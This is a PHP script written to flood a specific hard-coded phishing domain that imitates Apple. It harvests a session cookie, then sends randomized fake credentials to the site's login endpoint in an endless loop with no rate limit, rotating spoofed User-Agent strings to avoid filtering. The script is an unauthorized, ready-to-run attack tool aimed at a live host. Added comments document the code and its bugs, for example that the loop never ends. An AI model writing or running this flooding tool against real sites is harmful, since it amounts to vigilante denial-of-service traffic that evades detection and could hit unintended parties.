There's a website pretending to be Apple; its emails are even passing some spam filters. Let's spam them.
<?php
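/**
 * Returns a string of random alphanumeric characters ([0-9a-zA-Z]).
 *
 * The alphabet is repeated enough times to cover $length, shuffled, and cut
 * to size. The cut starts at offset 0: the earlier version started at offset 1,
 * which silently returned one character too few whenever $length was a
 * multiple of the alphabet size (e.g. 62 -> 61 characters).
 *
 * str_shuffle() uses PHP's general-purpose (non-cryptographic) RNG, which is
 * adequate for filler text but not for tokens, passwords or anything a
 * security decision depends on - use random_int()/random_bytes() for those.
 *
 * @param int $length Number of characters to return; default 10. Values below 1 yield ''.
 * @return string The randomized string, exactly $length characters long.
 */
function generate_random_string($length = 10) {
    $alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $length = (int) $length;
    if ($length < 1) {
        // str_repeat() rejects negative counts; treat "nothing requested" as an empty result.
        return '';
    }
    // Enough copies of the alphabet that the shuffled pool is at least $length long.
    $repeats = (int) ceil($length / strlen($alphabet));
    return substr(str_shuffle(str_repeat($alphabet, $repeats)), 0, $length);
}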
/**
 * Returns one desktop browser User-Agent string chosen uniformly at random
 * from a fixed list (Chrome, Firefox, Safari and Edge on Windows, macOS and Linux).
 *
 * @return string The User-Agent header value to send with the request.
 */
function get_random_useragent(){
    $pool = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15",
        "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36",
    ];
    // array_rand() on a list hands back one of its integer keys.
    $pick = array_rand($pool);
    return $pool[$pick];
}
// ---------------------------------------------------------------------------
// Main script. Flow: (1) GET $session_url and harvest its Set-Cookie headers;
// (2) if a $session_cookie_name cookie came back, POST randomized xuser/xpass
// pairs to $post_url in a loop, counting "HTTP 200 with an empty body" as a hit.
// The target host is hard-coded in the three URLs below; nothing is parameterized.
// ---------------------------------------------------------------------------
// This is where we are sending the garbage data
$post_url = "https://pagelayout-safelogin2000.fvhdstgeorgesschoolbirmingham.com/account/truelogin.php";
// This is where we obtain the elusive PHPSESSIONID
$session_url = "https://pagelayout-safelogin2000.fvhdstgeorgesschoolbirmingham.com/account/";
// We inject this to add further validity to our requests
$hostname_url = "pagelayout-safelogin2000.fvhdstgeorgesschoolbirmingham.com";
// So I can reuse this in the future, this is the cookie name for the session ID.
$session_cookie_name = "PHPSESSID";
// Running tally of requests that came back 200 with an empty body.
$garbage_creds_sent = 0;
// We check for Curl's presence in your PHP environment
// (non-strict in_array(); harmless here because get_loaded_extensions() returns strings)
if (in_array ('curl', get_loaded_extensions())) {
echo "curl installed\n";
echo "Obtaining new PHP Session ID...\n";
// Initiate an instance of Curl, let's get that sessionID
$ch = curl_init($session_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// CURLOPT_HEADER=1 puts the response headers into $result, which the regex below scans.
curl_setopt($ch, CURLOPT_HEADER, 1);
// $result is false on a transport failure; the regex then matches nothing and the
// cookie check below takes the "Could not find" branch. This handle is never
// curl_close()d - $ch is simply overwritten inside the loop.
$result = curl_exec($ch);
// REGEX to find all cookies in the returned header
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches);
// Let's loop through them...
// parse_str() treats each "name=value" like a query string: the value is
// URL-decoded and '.' or ' ' in the cookie name becomes '_'.
$cookies = array();
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
// Check if the cookie we're looking for exists...
// A missing key emits an "Undefined index/array key" warning and evaluates to
// null (falsy); a cookie whose value is "" or "0" is also treated as missing.
if ( $cookies[$session_cookie_name] ){
echo "I'm in! Initiating spam!\n";
// This will stop the while loop if we find something odd with the return
// NOTE: nothing in the loop ever assigns $has_error = true, so as written the
// loop ends only on an uncaught fatal error or an external interrupt; the
// comment before the final echo assumes a stop on non-200 that is not implemented.
$has_error = false;
// Let the games begin
// No iteration cap, no delay between requests, no backoff on failure.
while( $has_error === false ){
$ch = curl_init($post_url);
// we're setting up our cookie we got in the beginning and a fake user agent
// some websites filter against this. I know this is evil but screw these phishing
// scoundrels!
$headers = array(
"Cookie: $session_cookie_name=". $cookies[$session_cookie_name],
"Content-type: application/x-www-form-urlencoded; charset=UTF-8",
"Host: $hostname_url",
"Origin: https:\\\\$hostname_url",
// Randomized user agent because why not?
"User-Agent: " . get_random_useragent()
);
// A few more settings, remember we're sending this info as POST
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POST, 1);
// I also randomize the size of the garbage we're sending so they can't just query passwords/users of a certain size.
// The body is built by string concatenation; generate_random_string() only emits
// [0-9A-Za-z], so no URL-encoding is needed for these two fields.
curl_setopt($ch, CURLOPT_POSTFIELDS, "xuser=" . generate_random_string(rand(5,32)) . "&xpass=" . generate_random_string(rand(8,128)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// GO!
$return = curl_exec($ch);
// Now we check what we got
// A transport error is detected but neither reported nor acted on: the loop
// just moves on to the next request.
if (!curl_errno($ch)) {
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// If we get an HTTP Code of 200 (Success) and an empty string (meaning no PHP errors on their side...)
// curl_getinfo() returns an int here, so === 200 is a valid strict check; $return is a
// string when errno is 0, so the loose == "" only matches a genuinely empty body.
// Any other status/body combination is silently ignored and the loop continues.
if ( $http_code === 200 && $return == ""){
// Count this as a win
$garbage_creds_sent++;
// Show our kind users they are making a difference!
echo "Hit! ($garbage_creds_sent so far!)\n";
}
}
// Close this instance!
curl_close($ch);
}
} else {
// Couldn't find the session cookie
echo "Could not find configured cookie...\n";
// Let's exit gracefully..
exit(2);
}
// If they don't give us a 200 or a PHP error occurs, the while loop should stop, and we should tell the user something happened.
// (Reached only if the while loop above exits, which the current code never arranges.)
echo "I think either their site went down or they caught up to us. However... We sent them " . $garbage_creds_sent . " bad login(s)!";
exit(0);
} else {
// Plain and simple, you don't have curl. Please install.
echo "Please install Curl\n";
exit(1);
}